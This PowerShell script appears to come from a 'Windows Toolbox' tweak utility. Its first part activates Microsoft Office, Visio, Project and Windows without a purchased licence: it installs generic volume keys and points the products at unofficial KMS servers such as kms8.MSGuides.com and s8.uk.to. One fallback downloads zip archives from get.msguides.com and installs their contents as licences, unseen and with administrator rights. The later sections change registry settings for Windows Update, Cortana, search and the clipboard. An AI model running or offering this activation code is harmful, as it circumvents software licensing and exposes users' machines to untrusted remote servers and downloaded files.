if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
Write-Host @"
>> Please wait...
"@
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
Write-Host ">> Activating Office"
$hiden = ""
$hiden = cscript //nologo slmgr.vbs /ckms
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:WFG99
$hiden = cscript //nologo ospp.vbs /unpkey:DRTFM
$hiden = cscript //nologo ospp.vbs /unpkey:BTDRB
$hiden = cscript //nologo ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Office has been Activated successfully
"@ -ForegroundColor green ; Break
}
Write-Host ">> Fail...! trying Other Options"
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
Write-Host @"
>> Please wait...
"@
$hiden = ""
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\ProjectProVL_KMS_Client-ppd.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\ProjectProVL_KMS_Client-ul-oob.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\ProjectProVL_KMS_Client-ul.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-bridge-office.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-root.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-stil.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-ul.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-ul-oob.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\pkeyconfig-office.xrm-ms"
Write-Host ">> Activating MS Visio"
$hiden = cscript //nologo slmgr.vbs /ckms
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:KQBVC
$hiden = cscript //nologo ospp.vbs /unpkey:G83KT
$hiden = cscript //nologo ospp.vbs /inpkey:YG9NW-3K39V-2T3HJ-93F3Q-G83KT
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Visio has been Activated successfully
"@ -ForegroundColor green ; Break
}else{
Write-Host @"
>> Fail...! trying different Server...
"@
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\client-issuance*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\projectprovl_kms*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\projectpro2019vl_kms*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
Write-Host ">> Activating MS Visio"
$hiden = ""
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\pkeyconfig-office.xrm-ms"
$hiden = cscript //nologo slmgr.vbs /ckms
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:PKD2B
$hiden = cscript //nologo ospp.vbs /inpkey:B4NPR-3FKK7-T2MBV-FRQ4W-PKD2B
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Visio has been Activated successfully
"@ -ForegroundColor green ; $Formmini.WindowState = 0 ; Break
}
}
Write-Host ">> Fail...! trying Other Options"
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
Write-Host @"
>> Please wait...
"@
$hiden = ""
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\ProjectProVL_KMS_Client-ppd.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\ProjectProVL_KMS_Client-ul-oob.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\ProjectProVL_KMS_Client-ul.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-bridge-office.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-root.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-stil.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-ul.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\client-issuance-ul-oob.xrm-ms"
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\pkeyconfig-office.xrm-ms"
Write-Host ">> Activating MS Project"
$hiden = ""
$hiden = cscript //nologo slmgr.vbs /ckms
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:KQBVC
$hiden = cscript //nologo ospp.vbs /unpkey:G83KT
$hiden = cscript //nologo ospp.vbs /inpkey:YG9NW-3K39V-2T3HJ-93F3Q-G83KT
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Project has been Activated successfully
"@ -ForegroundColor green ; Break
}else{
Write-Host @"
>> Fail...! trying different Server...
"@
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\client-issuance*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\projectprovl_kms*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\projectpro2019vl_kms*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
Write-Host ">> Activating MS Project"
$hiden = ""
$hiden = cscript //b ospp.vbs /inslic:"..\root\Licenses16\pkeyconfig-office.xrm-ms"
$hiden = cscript //nologo slmgr.vbs /ckms
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:PKD2B
$hiden = cscript //nologo ospp.vbs /inpkey:B4NPR-3FKK7-T2MBV-FRQ4W-PKD2B
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Project has been Activated successfully
"@ -ForegroundColor green ; Break
}
}
Write-Host ">> Fail...! trying Other Options"
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office15\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office15"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office15\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office15"}
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office14\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office14"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office14\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office14"}
Write-Host @"
>> Please wait...
"@
Import-Module BitsTransfer
$ProgressPreference = "SilentlyContinue"
$ProgressPreference = "SilentlyContinue"
$ProgressPreference = "SilentlyContinue"
Start-BitsTransfer -Source "https://get.msguides.com/office2010/Office_2010_Library.zip" -Destination "$env:TEMP"
Start-BitsTransfer -Source "https://get.msguides.com/office2013/Office_2013_Library.zip" -Destination "$env:TEMP"
Expand-Archive "$env:TEMP\Office_2010_Library.zip" -DestinationPath "C:\" -Force
Expand-Archive "$env:TEMP\Office_2013_Library.zip" -DestinationPath "C:\" -Force
del "$env:TEMP\Office_2010_Library.zip"
del "$env:TEMP\Office_2013_Library.zip"
$files = Get-ChildItem -Path C:\library -name
foreach($i in 1..7){
$hiden = cscript //b ospp.vbs /inslic:$files[$i]
}
Remove-Item C:\library -Recurse -Force
$ProgressPreference = "Continue"
Write-Host ">> Activating Office"
$hiden = ""
$hiden = cscript //nologo ospp.vbs /inpkey:VYBBJ-TRJPB-QFQRF-QFT4D-H3GVB
$hiden = cscript //nologo ospp.vbs /inpkey:YC7DK-G2NP3-2QQC3-J6H88-GVGXT
$hiden = cscript //nologo ospp.vbs /sethst:kms8.msguides.com
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Office has been Activated successfully
"@ -ForegroundColor green ; Break
}
Write-Host @"
Microsoft Office/visio/Project didn't Activate
- Make sure that office is installed in "C" drive
- Run Windows Toolbox with Administrative rights
- Make sure that you're connected to the internet
- Make sure that Window Script Host(WSH) is enabled
- Try again later "Microsoft(KMS) server can be busy"
"@ -ForegroundColor red
Break
}
$formWindowsToolbox.WindowState = 0
#endregion buttonActivateMSOffice
#region buttonActivateWindow
$formWindowsToolbox.WindowState = 1
$Sysdir = [System.Environment]::SystemDirectory
$hiden = Set-Location -Path $Sysdir -PassThru
Write-Host @"
>> Please wait...
"@
$initreturn = cscript //nologo slmgr.vbs /ckms
$initreturn = cscript //nologo slmgr.vbs /upk
$initreturn = cscript //nologo slmgr.vbs /cpky
$initreturn = ""
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk WNMTR-4C88C-JK8YV-HQ7T2-76DF9}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 2F77B-TNFGY-69QQF-B8YKP-D69TJ}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk QFFDN-GRT3P-VKWWX-X7T3R-8B639}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk PVMJN-6DFY6-9CCP6-7BKTT-D3WVR}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk MH37W-N47XK-V7XM9-C7227-GCQG9}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk MHF9N-XY6XB-WVXMC-BTDCT-MKKG7}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk TT4HM-HN7YT-62K67-RGRQJ-JFFXW}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 32JNW-9KQ84-P47T8-D8GGY-CWCK7}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk JMNMF-RHW7P-DMY6X-RF3DR-X2BQT}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk GCRJD-8NW9H-F2CDX-CCM8D-9D6T9}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk HMCNV-VVBFX-7HMBH-CTY9B-B4FXY}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk NG4HW-VH26C-733KW-K6F98-J8CK4}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk XCVCF-2NXM9-723PB-MHCB7-2RYQQ}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk BN3D2-R7TKB-3YPBD-8DRP2-27GG4}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 2WN2H-YGCQR-KFX6K-CD6TF-84YXQ}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk GNBB8-YVD74-QJHX6-27H4K-8QHDG}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk M9Q9P-WNJJT-6PXPY-DWX8H-6XWKK}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 7B9N3-D94CG-YTVHR-QBPX3-RJP64}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk BB6NG-PQ82V-VRDPW-8XVD2-V8P66}
if ($initreturn -notmatch "successfully"){$initreturn = cscript //nologo slmgr.vbs /ipk 789NJ-TQK6T-6XTH8-J39CJ-J8D3P}
Write-Host @"
>> Activating Windows
"@
For () {
$initreturn = cscript //nologo slmgr.vbs /skms s8.uk.to
if ($initreturn -match "successfully"){$initreturn = cscript //nologo slmgr.vbs /ato ; if($initreturn -match "successfully"){write-host $initreturn[0] -ForegroundColor green ; write-host $initreturn[1] -ForegroundColor green ; Break}}
$initreturn = cscript //nologo slmgr.vbs /skms s9.uk.to
if ($initreturn -match "successfully"){$initreturn = cscript //nologo slmgr.vbs /ato ; if($initreturn -match "successfully"){write-host $initreturn[0] -ForegroundColor green ; write-host $initreturn[1] -ForegroundColor green ; Break}}
$initreturn = cscript //nologo slmgr.vbs /skms kms7.MSGuides.com
if ($initreturn -match "successfully"){$initreturn = cscript //nologo slmgr.vbs /ato ; if($initreturn -match "successfully"){write-host $initreturn[0] -ForegroundColor green ; write-host $initreturn[1] -ForegroundColor green ; Break}}
Write-Host @"
Microsoft Key Management Service(KMS) didn't able to activate your window.
- Run Windows Toolbox with Administrative rights
- Make sure that you're connected to the internet
- Make sure that Window Script Host(WSH) is enabled
- Try again later "Microsoft(KMS) server can be busy"
"@ -ForegroundColor red
Break
}
$formWindowsToolbox.WindowState = 0
#endregion buttonActivateWindow
#region buttonDefaultSetting
Write-Host ""
Write-Host "Enabling driver offering through Windows Update..."
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Device Metadata" -Name "PreventDeviceMetadataFromNetwork" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Name "DontPromptForWindowsUpdate" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Name "DontSearchWindowsUpdate" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Name "DriverUpdateWizardWuSearchEnabled" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name "ExcludeWUDriversInQualityUpdate" -ErrorAction SilentlyContinue
Write-Host "Enabling Windows Update automatic restart..."
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name "NoAutoRebootWithLoggedOnUsers" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name "AUPowerManagement" -ErrorAction SilentlyContinue
Write-Host "Enabled driver offering through Windows Update"
#endregion buttonDefaultSetting
#region buttonSecurityUpdateOnly
Write-Host ""
Write-Host "Disabling driver offering through Windows Update..."
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Device Metadata")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Device Metadata" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Device Metadata" -Name "PreventDeviceMetadataFromNetwork" -Type DWord -Value 1
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Name "DontPromptForWindowsUpdate" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Name "DontSearchWindowsUpdate" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DriverSearching" -Name "DriverUpdateWizardWuSearchEnabled" -Type DWord -Value 0
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name "ExcludeWUDriversInQualityUpdate" -Type DWord -Value 1
Write-Host "Disabling Windows Update automatic restart..."
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name "NoAutoRebootWithLoggedOnUsers" -Type DWord -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name "AUPowerManagement" -Type DWord -Value 0
Write-Host "Disabled driver offering through Windows Update"
#endregion buttonSecurityUpdateOnly
#///////////////////////////////////////////#///////////////////////////////////////////#///////////////////////////////////////////#///////////////////////////////////////////
#region buttonenableCortana
Write-Host "`nEnabling Cortana..."
Remove-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Personalization\Settings" -Name "AcceptedPrivacyPolicy" -ErrorAction SilentlyContinue
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" -Force | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization" -Name "RestrictImplicitTextCollection" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization" -Name "RestrictImplicitInkCollection" -Type DWord -Value 0
Remove-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" -Name "HarvestContacts" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search" -Name "AllowCortana" -ErrorAction SilentlyContinue
Write-Host "Done - Reverted to Stock Settings"
#endregion buttonenableCortana
#region buttondisableCortana
Write-Host "`nDisabling Cortana..."
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Personalization\Settings")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Personalization\Settings" -Force | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Personalization\Settings" -Name "AcceptedPrivacyPolicy" -Type DWord -Value 0
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization" -Force | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization" -Name "RestrictImplicitTextCollection" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization" -Name "RestrictImplicitInkCollection" -Type DWord -Value 1
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore")) {
New-Item -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" -Force | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" -Name "HarvestContacts" -Type DWord -Value 0
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search" -Name "AllowCortana" -Type DWord -Value 0
Write-Host "Cortana has been disabled" -ForegroundColor green
#endregion buttondisableCortana
#region buttonenableActionCenter
Write-Host "`nEnabling Action Center..."
Remove-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -ErrorAction SilentlyContinue
Write-Host "Done - Reverted to Stock Settings"
#endregion buttonenableActionCenter
#region buttondisableActionCenter
Write-Host "`nDisabling Action Center..."
If (!(Test-Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Explorer")) {
New-Item -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Explorer" | Out-Null
}
Set-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Explorer" -Name "DisableNotificationCenter" -Type DWord -Value 1
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
Write-Host "Action Center has been disabled" -ForegroundColor green
#endregion buttondisableActionCenter
#region buttonenableWindowsSearch
Write-Host "`nRestoring Windows Search..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" -Name "BingSearchEnabled" -Type DWord -Value "1"
Remove-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" -Name "CortanaConsent" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search" -Name "DisableWebSearch" -ErrorAction SilentlyContinue
Write-Host "Restore and Starting Windows Search Service..."
Set-Service "WSearch" -StartupType Automatic
Start-Service "WSearch" -WarningAction SilentlyContinue
Write-Host "Restore Windows Search Icon..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" -Name "SearchboxTaskbarMode" -Type DWord -Value 1
Write-Host "Done - Reverted to Stock Settings"
#endregion buttonenableWindowsSearch
#region buttondisableWindowsSearch
Write-Host "`nDisabling Bing Search in Start Menu..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" -Name "BingSearchEnabled" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" -Name "CortanaConsent" -Type DWord -Value 0
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search" -Force | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search" -Name "DisableWebSearch" -Type DWord -Value 1
Write-Host "Stopping and disabling Windows Search indexing service..."
Stop-Service "WSearch" -WarningAction SilentlyContinue
Set-Service "WSearch" -StartupType Disabled
Write-Host "Hiding Taskbar Search icon / box..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" -Name "SearchboxTaskbarMode" -Type DWord -Value 0
Write-Host "Windows Search has been disabled" -ForegroundColor green
#endregion buttondisableWindowsSearch
#region buttonenableBackgroundApps
Write-Host "`nAllowing Background Apps..."
Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" -Exclude "Microsoft.Windows.Cortana*" | ForEach {
Remove-ItemProperty -Path $_.PsPath -Name "Disabled" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path $_.PsPath -Name "DisabledByUser" -ErrorAction SilentlyContinue
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" -Name "GlobalUserDisabled" -Type DWord -Value 0
Write-Host "Done - Reverted to Stock Settings"
#endregion buttonenableBackgroundApps
#region buttondisableBackgroundApps
Write-Host "`nDisabling Background application access..."
Get-ChildItem -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" -Exclude "Microsoft.Windows.Cortana*" | ForEach {
Set-ItemProperty -Path $_.PsPath -Name "Disabled" -Type DWord -Value 1
Set-ItemProperty -Path $_.PsPath -Name "DisabledByUser" -Type DWord -Value 1
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" -Name "GlobalUserDisabled" -Type DWord -Value 1
Write-Host "Background application has been Disabled" -ForegroundColor green
#endregion buttondisableBackgroundApps
#region buttonenableClipboardHistory
Write-Host "`nRestoring Clipboard History..."
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Clipboard" -Name "EnableClipboardHistory" -Type DWord -Value "1"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "AllowClipboardHistory" -Type DWord -Value "1"
Write-Host "Done - Reverted to Stock Settings"
#endregion buttonenableClipboardHistory
#region buttondisableClipboardHistory
Write-Host "`nDisabling Clipboard History..."
Remove-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Clipboard" -Name "EnableClipboardHistory" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name "AllowClipboardHistory" -ErrorAction SilentlyContinue
Write-Host "Clipboard History has been disabled" -ForegroundColor green
#endregion buttondisableClipboardHistory
#region buttonenableSetTimerResolution
$nonea = bcdedit /set useplatformclock no
$nonea = bcdedit /set useplatformtick yes
$nonea = bcdedit /set disabledynamictick yes
$ntqtrmin = $null
$ntqtrmax = $null
$ntqtrcur = $null
$ntdesiredres = 5000
$ntsetres = $true
$ntcurrentres = 156250
$MethodDefinition = @'
[DllImport("ntdll.dll", SetLastError=true)]
public static extern NtStatus NtQueryTimerResolution(out uint MinimumResolution, out uint MaximumResolution, out uint ActualResolution);
[DllImport("ntdll.dll", SetLastError=true)]
public static extern int NtSetTimerResolution(int DesiredResolution, bool SetResolution, out int CurrentResolution );
'@
$NtStatus = Add-Type -MemberDefinition $MethodDefinition -Name 'NtStatus' -Namespace 'Win32' -PassThru
$ret1 = [Win32.NtStatus]::NtSetTimerResolution($ntdesiredres,$ntsetres,[ref]$ntcurrentres)
[Win32.NtStatus]::NtQueryTimerResolution([ref]$ntqtrmin, [ref]$ntqtrmax, [ref]$ntqtrcur)
